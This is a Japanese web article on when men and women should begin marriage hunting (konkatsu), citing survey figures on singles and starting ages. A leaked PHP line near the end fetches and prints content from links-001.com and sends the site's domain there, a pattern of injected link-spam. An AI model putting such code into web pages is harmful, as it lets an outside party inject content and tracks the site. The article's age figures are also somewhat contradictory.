前へ
次へ

婚活っていつから始める?

国のある統計調査によると、現在18~39歳の独身の人を対象にした調査で特定の交際相手がいないと答えた人の割合が男性では約6割、女性も約5割と男女どちらでも半数近い人が特定の交際相手がいないという結果が出ています。しかし、一方で同じ年代を対象に結婚をしたいと考える人の割合を調査すると、男性は約40%、女性が57%の人が結婚をしたいと思っているという結果が出ています。つまり結婚はしたいと考えているけれど交際相手はいないという人も多いということが言えます。こういったことを踏まえると、結婚相手を探す「婚活」が人気なのも少しわかるような気がします。しかし、いざ「婚活」といわれてもいつから始めればいいのか?など様々な疑問があります。実際に婚活している人はいつから始めているのでしょうか。実際のアンケート調査などを見てみると、女性の場合は25〜30歳と20代前半であるのに対し、男性は30代前半と男性の方が婚活を始める年齢が女性よりも遅いということが言えます。女性の方が早い理由としては、周りから促されるケースや出産などを考えると早い方がいいという現実的な問題、どうしても年齢が若い方が結婚相手となる男性を見つけやすいといったなかなかシビアな現状があるようです。一方男性が婚活を始めるのが女性よりも遅い理由として、仕事が落ち着いてくるのが大体その時期になる、ということやどうしても結婚相手の年収を重視する女性が多いということ、女性ほどには結婚に関するプレッシャーが少ないという点もあるようです。こういった点を踏まえると、女性はできれば20代後半くらいには「婚活」を始めておいた方がよさそうです。厳しい話になりますが、実際に20代で始めた女性の方が30代から始めた女性よりも結婚に結び付く割合が高いことや男性が女性を選ぶ条件に「年齢」があがってくるという結果もあります。こういった点を考えると、やはり「婚活」は早めに始めておく方が良いといえそうです。また、男性も早く始めるに越したことはないとも言えます。女性に比べそういった意味で年齢をしている人は少ないですが、やはり男性も35歳を超えてくると見た目に年齢が出てきますし、30代前半だと始める人が多い分ライバルが多いため、競争も激しくなるでしょう。男性・女性ともに、もし「婚活」を始めたいのであればなるべく早めにしておくのがおすすめのようです。結婚相談所などはちょっと…と思う方でも今は気軽に参加できる婚活パーティなどもあるので、出会いを求めて思い切って参加してみるというのも悪くはないのではないでしょうか。

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top